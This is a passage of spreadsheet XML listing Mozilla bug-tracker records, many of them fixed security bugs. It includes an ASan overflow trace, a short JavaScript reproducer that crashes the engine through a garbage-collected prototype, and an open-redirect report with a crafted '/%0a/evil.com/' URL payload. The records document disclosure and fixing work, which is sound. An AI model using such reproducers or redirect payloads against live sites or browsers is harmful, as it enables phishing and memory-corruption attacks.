      </c>
      <c r="E161" t="n">
        <v>1</v>
      </c>
      <c r="F161" t="n">
        <v>1</v>
      </c>
      <c r="G161" t="n">
        <v>3</v>
      </c>
      <c r="H161" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I161" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J161" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K161" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P161" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q161" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R161" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S161" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T161" t="n">
        <v>1</v>
      </c>
      <c r="U161" t="n">
        <v>0</v>
      </c>
      <c r="V161" t="n">
        <v>22</v>
      </c>
      <c r="W161" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6) Gecko/20040113
in UTF8ToNewUnicode
&gt;copy_string(aSource.BeginReading(start), aSource.EndReading(end),
&gt;                calculator);
if aSource include none-UTF8 chachacter such as 0xFC 0xDF 
calculator.Length() == 0
&gt;PRUnichar *result = NS_STATIC_CAST(PRUnichar*,
&gt;        nsMemory::Alloc(sizeof(PRUnichar) * (calculator.Length() + 1)));
length of result = 2
&gt;
&gt;    ConvertUTF8toUTF16 converter(result);
&gt;    copy_string(aSource.BeginReading(start), aSource.EndReading(end),
                converter).write_terminator();
if aSource is like "something(0xFC 0xDF)" result will be "something". Danger.
A walk through is to remove the mLength = 0; in
xpcom/string/public/nsUTF8Utils.h:256
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X161" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" t="n">
        <v>783502</v>
      </c>
      <c r="B162" t="inlineStr">
        <is>
          <t>2012-08-17 02:39:33 -0700</t>
        </is>
      </c>
      <c r="C162" t="inlineStr">
        <is>
          <t>xpcshell test netwerk/test/unit/test_MIME_params.js fails on AddressSanitizer</t>
        </is>
      </c>
      <c r="D162" t="inlineStr">
        <is>
          <t>2013-01-10 12:35:01 -0800</t>
        </is>
      </c>
      <c r="E162" t="n">
        <v>1</v>
      </c>
      <c r="F162" t="n">
        <v>1</v>
      </c>
      <c r="G162" t="n">
        <v>3</v>
      </c>
      <c r="H162" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I162" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J162" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K162" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N162" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P162" t="inlineStr">
        <is>
          <t>[advisory-tracking+][asan][asan-test-failure][qa-]</t>
        </is>
      </c>
      <c r="Q162" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R162" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S162" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T162" t="n">
        <v>1</v>
      </c>
      <c r="U162" t="n">
        <v>0</v>
      </c>
      <c r="V162" t="n">
        <v>31</v>
      </c>
      <c r="W162" t="inlineStr">
        <is>
          <t>The xpcshell test netwerk/test/unit/test_MIME_params.js shows an AddressSanitizer error on mozilla-central revision f7cf60910637:
==60029== ERROR: AddressSanitizer heap-buffer-overflow on address 0x2b9c8cf9cac8 at pc 0x2b9c7660df1c bp 0x7fff28d1b650 sp 0x7fff28d1b648
READ of size 1 at 0x2b9c8cf9cac8 thread T0
    #0 0x2b9c7660df1c in nsMIMEHeaderParamImpl::DoParameterInternal(char const*, char const*, nsMIMEHeaderParamImpl::ParamDecoding, char**, char**, char**) mozilla-central/netwerk/mime/nsMIMEHeaderParamImpl.cpp:449
    #1 0x2b9c7660c72d in nsMIMEHeaderParamImpl::DoGetParameter(nsACString_internal const&amp;, char const*, nsMIMEHeaderParamImpl::ParamDecoding, nsACString_internal const&amp;, bool, char**, nsAString_internal&amp;) mozilla-central/netwerk/mime/nsMIMEHeaderParamImpl.cpp:82
    #2 0x2b9c7660c47f in nsMIMEHeaderParamImpl::GetParameter(nsACString_internal const&amp;, char const*, nsACString_internal const&amp;, bool, char**, nsAString_internal&amp;) mozilla-central/netwerk/mime/nsMIMEHeaderParamImpl.cpp:49
    #3 0x2b9c793e7490 in NS_InvokeByIndex_P mozilla-central/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:165
    #4 0x2b9c783686ad in CallMethodHelper::Invoke() mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:3118
    #5 0x2b9c78368186 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:2418
    #6 0x2b9c7837f22a in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) mozilla-central/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #7 0x2b9c8cc0c36f in
    #8 0x2b9c7a7f3b67 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) mozilla-central/js/src/methodjit/MethodJIT.cpp:1016
    #9 0x2b9c7a7f4a24 in CheckStackAndEnterMethodJIT(JSContext*, js::StackFrame*, void*, bool) mozilla-central/js/src/methodjit/MethodJIT.cpp:1074
    #10 0x2b9c7a33352f in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) mozilla-central/js/src/jsinterp.cpp:1475
    #11 0x2b9c7a2fe9bd in js::RunScript(JSContext*, JSScript*, js::StackFrame*) mozilla-central/js/src/jsinterp.cpp:308
    #12 0x2b9c7a35588b in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) mozilla-central/js/src/jsinterp.cpp:492
    #13 0x2b9c7a355f60 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) mozilla-central/js/src/jsinterp.cpp:529
    #14 0x2b9c7a165f36 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) mozilla-central/js/src/jsapi.cpp:5708
    #15 0x2b9c7a1678b7 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, char const*, unsigned long, JS::Value*) mozilla-central/js/src/jsapi.cpp:5723
    #16 0x4110cb in ProcessArgs(JSContext*, JSObject*, char**, int) mozilla-central/js/xpconnect/shell/xpcshell.cpp:1215
    #17 0x2b9c7ec0b30d in __libc_start_main /build/buildd/eglibc-2.13/csu/libc-start.c:258
0x2b9c8cf9cac8 is located 0 bytes to the right of 72-byte region [0x2b9c8cf9ca80,0x2b9c8cf9cac8)
allocated by thread T0 here:
    #0 0x43b401 in __interceptor_malloc ??:0
    #1 0x2b9c793f71d7 in nsStringBuffer::Alloc(unsigned long) mozilla-central/xpcom/string/src/nsSubstring.cpp:177
    #2 0x2b9c793fc65a in nsACString_internal::MutatePrep(unsigned int, char**, unsigned int*) mozilla-central/xpcom/string/src/nsTSubstring.cpp:130
    #3 0x2b9c793ff202 in nsACString_internal::SetCapacity(unsigned int, mozilla::fallible_t const&amp;) mozilla-central/xpcom/string/src/nsTSubstring.cpp:553
    #4 0x2b9c793ff143 in nsACString_internal::SetCapacity(unsigned int) mozilla-central/xpcom/string/src/nsTSubstring.cpp:532
    #5 0x2b9c793ff6bc in nsACString_internal::SetLength(unsigned int) mozilla-central/xpcom/string/src/nsTSubstring.cpp:583
    #6 0x2b9c782fe89c in nsACString_internal::Length() const mozilla-central/../../../dist/include/nsTSubstring.h:209
    #7 0x2b9c783704db in CallMethodHelper::ConvertIndependentParam(unsigned char) mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:2882
    #8 0x2b9c78368513 in CallMethodHelper::ConvertIndependentParams(int*) mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:2804
    #9 0x2b9c78368186 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) mozilla-central/js/xpconnect/src/XPCWrappedNative.cpp:2418
    #10 0x2b9c7837f22a in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) mozilla-central/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #11 0x2b9c8cc0c36f in
    #12 0x2b9c7a7f3b67 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) mozilla-central/js/src/methodjit/MethodJIT.cpp:1016
    #13 0x2b9c7a7f4a24 in CheckStackAndEnterMethodJIT(JSContext*, js::StackFrame*, void*, bool) mozilla-central/js/src/methodjit/MethodJIT.cpp:1074
    #14 0x2b9c7a33352f in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) mozilla-central/js/src/jsinterp.cpp:1475
    #15 0x2b9c7a2fe9bd in js::RunScript(JSContext*, JSScript*, js::StackFrame*) mozilla-central/js/src/jsinterp.cpp:308
    #16 0x2b9c7a35588b in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) mozilla-central/js/src/jsinterp.cpp:492
    #17 0x2b9c7a355f60 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) mozilla-central/js/src/jsinterp.cpp:529
    #18 0x2b9c7a165f36 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) mozilla-central/js/src/jsapi.cpp:5708
    #19 0x2b9c7a1678b7 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, char const*, unsigned long, JS::Value*) mozilla-central/js/src/jsapi.cpp:5723
    #20 0x4110cb in ProcessArgs(JSContext*, JSObject*, char**, int) mozilla-central/js/xpconnect/shell/xpcshell.cpp:1215
    #21 0x2b9c7ec0b30d in __libc_start_main /build/buildd/eglibc-2.13/csu/libc-start.c:258</t>
        </is>
      </c>
      <c r="X162" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" t="n">
        <v>487204</v>
      </c>
      <c r="B163" t="inlineStr">
        <is>
          <t>2009-04-07 06:12:21 -0700</t>
        </is>
      </c>
      <c r="C163" t="inlineStr">
        <is>
          <t>js_FillPropertyCache is called with garbage-collected pobj</t>
        </is>
      </c>
      <c r="D163" t="inlineStr">
        <is>
          <t>2010-03-17 19:08:45 -0700</t>
        </is>
      </c>
      <c r="E163" t="n">
        <v>1</v>
      </c>
      <c r="F163" t="n">
        <v>1</v>
      </c>
      <c r="G163" t="n">
        <v>3</v>
      </c>
      <c r="H163" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I163" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J163" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K163" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N163" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P163" t="inlineStr">
        <is>
          <t>[needs approval/landing for 1.8 branch][sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q163" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R163" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S163" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T163" t="n">
        <v>1</v>
      </c>
      <c r="U163" t="n">
        <v>0</v>
      </c>
      <c r="V163" t="n">
        <v>106</v>
      </c>
      <c r="W163" t="inlineStr">
        <is>
          <t>The current code, when calls js_FillPropertyCache for properties found on prototype chains, does not detect that a setter or getter could have deleted the prototype and GC-ed it. This would cause js_FillPropertyCache to access GC-ed objects. Here is an example that demonstrates this:
@watson~/m/tm/js/src&gt; cat ~/s/x1.js
var obj = { __proto__: { get a() { this.__proto__ = null; gc(); return 0; }}};
obj.a;
@watson~/m/tm/js/src&gt; ~/build/js32.tm.dbg/js ~/s/x1.js
before 20480, after 20480, break 08262000
Segmentation fault
This bug exists on 1.9.* branches and may (or may not) be related to the bug 484042.</t>
        </is>
      </c>
      <c r="X163" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" t="n">
        <v>851982</v>
      </c>
      <c r="B164" t="inlineStr">
        <is>
          <t>2013-03-17 17:48:06 -0700</t>
        </is>
      </c>
      <c r="C164" t="inlineStr">
        <is>
          <t>Assertion failure in nsUnicharStreamLoader::WriteSegmentFun with ISO-2022-JP (#2)</t>
        </is>
      </c>
      <c r="D164" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:49 -0800</t>
        </is>
      </c>
      <c r="E164" t="n">
        <v>1</v>
      </c>
      <c r="F164" t="n">
        <v>1</v>
      </c>
      <c r="G164" t="n">
        <v>3</v>
      </c>
      <c r="H164" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I164" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J164" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K164" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L164" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M164" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N164" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P164" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q164" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R164" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S164" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T164" t="n">
        <v>1</v>
      </c>
      <c r="U164" t="n">
        <v>0</v>
      </c>
      <c r="V164" t="n">
        <v>15</v>
      </c>
      <c r="W164" t="inlineStr">
        <is>
          <t>Created attachment 725954
testcase
Assertion failure: ((bool)(__builtin_expect(!!(!NS_FAILED_impl(rv)), 1))), at netwerk/base/src/nsUnicharStreamLoader.cpp:218
Same assertion as bug 843434, which Josh fixed last week.</t>
        </is>
      </c>
      <c r="X164" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" t="n">
        <v>653026</v>
      </c>
      <c r="B165" t="inlineStr">
        <is>
          <t>2011-04-26 18:10:04 -0700</t>
        </is>
      </c>
      <c r="C165" t="inlineStr">
        <is>
          <t>GC hazard with NoSuchMethod</t>
        </is>
      </c>
      <c r="D165" t="inlineStr">
        <is>
          <t>2011-08-12 09:09:38 -0700</t>
        </is>
      </c>
      <c r="E165" t="n">
        <v>1</v>
      </c>
      <c r="F165" t="n">
        <v>1</v>
      </c>
      <c r="G165" t="n">
        <v>3</v>
      </c>
      <c r="H165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J165" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K165" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L165" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M165" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N165" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P165" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed-in-tracemonkey][in-testsuite?]</t>
        </is>
      </c>
      <c r="Q165" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R165" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S165" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T165" t="n">
        <v>1</v>
      </c>
      <c r="U165" t="n">
        <v>0</v>
      </c>
      <c r="V165" t="n">
        <v>13</v>
      </c>
      <c r="W165" t="inlineStr">
        <is>
          <t>Created attachment 528500
testcase
This script crashes in a shell with no jit options.</t>
        </is>
      </c>
      <c r="X165" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" t="n">
        <v>750514</v>
      </c>
      <c r="B166" t="inlineStr">
        <is>
          <t>2012-04-30 14:59:26 -0700</t>
        </is>
      </c>
      <c r="C166" t="inlineStr">
        <is>
          <t>Disable codesighs on Thunderbird try</t>
        </is>
      </c>
      <c r="D166" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E166" t="n">
        <v>1</v>
      </c>
      <c r="F166" t="n">
        <v>1</v>
      </c>
      <c r="G166" t="n">
        <v>5</v>
      </c>
      <c r="H166" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I166" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J166" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K166" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L166" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M166" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N166" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P166" t="inlineStr"/>
      <c r="Q166" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R166" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S166" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T166" t="n">
        <v>1</v>
      </c>
      <c r="U166" t="n">
        <v>0</v>
      </c>
      <c r="V166" t="n">
        <v>6</v>
      </c>
      <c r="W166" t="inlineStr">
        <is>
          <t>codesighs don't give added value on Thunderbird try server and are currently broken (bug 750513), so let's disable them.</t>
        </is>
      </c>
      <c r="X166" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" t="n">
        <v>1163109</v>
      </c>
      <c r="B167" t="inlineStr">
        <is>
          <t>2015-05-08 12:24:08 -0700</t>
        </is>
      </c>
      <c r="C167" t="inlineStr">
        <is>
          <t>Inline JPEG images fail to load</t>
        </is>
      </c>
      <c r="D167" t="inlineStr">
        <is>
          <t>2016-07-02 10:44:42 -0700</t>
        </is>
      </c>
      <c r="E167" t="n">
        <v>1</v>
      </c>
      <c r="F167" t="n">
        <v>1</v>
      </c>
      <c r="G167" t="n">
        <v>3</v>
      </c>
      <c r="H167" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I167" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J167" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K167" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M167" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P167" t="inlineStr">
        <is>
          <t>[pdfjs-c-ff-integration][adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q167" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R167" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S167" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T167" t="n">
        <v>1</v>
      </c>
      <c r="U167" t="n">
        <v>0</v>
      </c>
      <c r="V167" t="n">
        <v>52</v>
      </c>
      <c r="W167" t="inlineStr">
        <is>
          <t>Starting with today's Nightly (exact version below), all inline JPEG images fail to load.
&gt; Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 ID:20150508030204 CSet: 86203ac87a08
STR:
Open https://bug1065245.bugzilla.mozilla.org/attachment.cgi?id=8486973 in the latest Nightly.
ER:
The inline images should load. (Compare with the latest Aurora.)
AR:
The inline images does *not* load, and the following is printed in the browser console
&gt; Security Error: Content at resource://pdf.js/web/viewer.html may not load data from blob:null/8b97441b-5c39-460c-906b-3d689dc8febf.
&gt; Warning: Error during JPEG image loading pdf.js:235:5
&gt; Security Error: Content at resource://pdf.js/web/viewer.html may not load data from blob:null/14f13ad1-6fe9-4e14-98fa-d4a8c48c58f6.
&gt; Warning: Error during JPEG image loading pdf.js:235:5
&gt; Security Error: Content at resource://pdf.js/web/viewer.html may not load data from blob:null/70576a77-ea12-4196-b87e-b1720a314075.
&gt; Warning: Error during JPEG image loading pdf.js:235:5
&gt; Security Error: Content at resource://pdf.js/web/viewer.html may not load data from blob:null/4d5a83f2-9371-4ce6-ae3e-3eac52f920cd.
&gt; Warning: Error during JPEG image loading pdf.js:235:5
&gt; Warning: Dependent image isn't ready yet pdf.js:235:5
Initial investigation suggests that bug 1156875 might be responsible.</t>
        </is>
      </c>
      <c r="X167" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" t="n">
        <v>34550</v>
      </c>
      <c r="B168" t="inlineStr">
        <is>
          <t>2000-04-04 23:05:18 -0700</t>
        </is>
      </c>
      <c r="C168" t="inlineStr">
        <is>
          <t>Security modules don't compile on BeOS due to lack of XP_BEOS tags</t>
        </is>
      </c>
      <c r="D168" t="inlineStr">
        <is>
          <t>2000-05-17 21:12:38 -0700</t>
        </is>
      </c>
      <c r="E168" t="n">
        <v>1</v>
      </c>
      <c r="F168" t="n">
        <v>1</v>
      </c>
      <c r="G168" t="n">
        <v>3</v>
      </c>
      <c r="H168" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I168" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J168" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K168" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L168" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M168" t="inlineStr">
        <is>
          <t>BeOS</t>
        </is>
      </c>
      <c r="N168" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P168" t="inlineStr"/>
      <c r="Q168" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R168" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S168" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T168" t="n">
        <v>0</v>
      </c>
      <c r="U168" t="n">
        <v>0</v>
      </c>
      <c r="V168" t="n">
        <v>8</v>
      </c>
      <c r="W168" t="inlineStr">
        <is>
          <t>Attached is a diff of the files with changes made so that the security module 
can compile under BeOS.  I need someone to test and check this.  trivial 
changes but they are blocking BeOS.</t>
        </is>
      </c>
      <c r="X168" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" t="n">
        <v>654697</v>
      </c>
      <c r="B169" t="inlineStr">
        <is>
          <t>2011-05-04 06:55:37 -0700</t>
        </is>
      </c>
      <c r="C169" t="inlineStr">
        <is>
          <t>AoA reply is broken.</t>
        </is>
      </c>
      <c r="D169" t="inlineStr">
        <is>
          <t>2011-05-04 08:20:14 -0700</t>
        </is>
      </c>
      <c r="E169" t="n">
        <v>1</v>
      </c>
      <c r="F169" t="n">
        <v>1</v>
      </c>
      <c r="G169" t="n">
        <v>5</v>
      </c>
      <c r="H169" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I169" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J169" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K169" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N169" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P169" t="inlineStr"/>
      <c r="Q169" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R169" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S169" t="inlineStr">
        <is>
          <t>2.8.2</t>
        </is>
      </c>
      <c r="T169" t="n">
        <v>1</v>
      </c>
      <c r="U169" t="n">
        <v>0</v>
      </c>
      <c r="V169" t="n">
        <v>3</v>
      </c>
      <c r="W169" t="inlineStr">
        <is>
          <t>The CSRF change broke it.</t>
        </is>
      </c>
      <c r="X169" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" t="n">
        <v>1753838</v>
      </c>
      <c r="B170" t="inlineStr">
        <is>
          <t>2022-02-05 08:15:15 -0800</t>
        </is>
      </c>
      <c r="C170" t="inlineStr">
        <is>
          <t>Open redirect Vulnerability on pollbot.services.mozilla.com &amp; pollbot.stage.mozaws.net leads to trick users.</t>
        </is>
      </c>
      <c r="D170" t="inlineStr">
        <is>
          <t>2024-05-30 10:53:50 -0700</t>
        </is>
      </c>
      <c r="E170" t="n">
        <v>1</v>
      </c>
      <c r="F170" t="n">
        <v>1</v>
      </c>
      <c r="G170" t="n">
        <v>5</v>
      </c>
      <c r="H170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I170" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J170" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K170" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N170" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P170" t="inlineStr"/>
      <c r="Q170" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R170" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S170" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T170" t="n">
        <v>1</v>
      </c>
      <c r="U170" t="n">
        <v>0</v>
      </c>
      <c r="V170" t="n">
        <v>36</v>
      </c>
      <c r="W170" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Steps to reproduce:
Severity:-  Medium (Score:- 5)
Vulnerable URL:- https://pollbot.services.mozilla.com
Description:-
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain
Step to reproduce:-
1) Open https://pollbot.services.mozilla.com/v1/ on any browser
2) Then replace /v1/ with /%0a/evil.com/projectX.htm/
